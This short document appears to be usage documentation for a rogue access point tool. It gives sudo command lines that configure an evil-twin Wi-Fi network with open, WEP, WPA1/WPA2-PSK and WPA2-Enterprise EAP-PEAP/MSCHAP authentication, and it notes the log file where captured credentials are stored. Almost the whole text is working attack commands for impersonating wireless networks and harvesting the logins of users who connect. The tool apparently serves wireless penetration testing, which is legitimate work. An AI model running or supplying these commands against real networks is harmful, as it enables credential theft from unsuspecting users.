Configuring evil-twin AP with different authentication methods

Open Authentication

`bash sudo python3 /opt/rogue/rogue.py -i wlan0 --auth open --internet --preset-profile wifi4 --channel-randomiser `

WEP Authentication

`bash sudo python3 /opt/rogue/rogue.py -i wlan0 --auth wep --wep-key-version 0 --wep-key 4141414141 --preset-profile wifi4 --channel-randomiser `

WPA-PSK Authentication

WPA1-PSK Authentication

`bash sudo python3 /opt/rogue/rogue.py -i wlan0 --auth wpa-personal --wpa 1 --wpa-passphrase "test test" --preset-profile wifi4 --channel-randomiser `

WPA2-PSK Authentication

`bash sudo python3 /opt/rogue/rogue.py -i wlan0 --auth wpa-personal --wpa 2 --wpa-passphrase "test test" --preset-profile wifi4 --channel-randomiser `

WPA2-Enterprise Authentication

EAP-PEAP/MSCHAP Authentication

`bash sudo python3 /opt/rogue/rogue.py -i wlan0 --auth wpa-enterprise --preset-profile wifi4 --channel-randomiser --default-eap peap -E all `

Note: Captured credentials will be stored in /opt/rogue/logs/freeradius-server-wpe.log.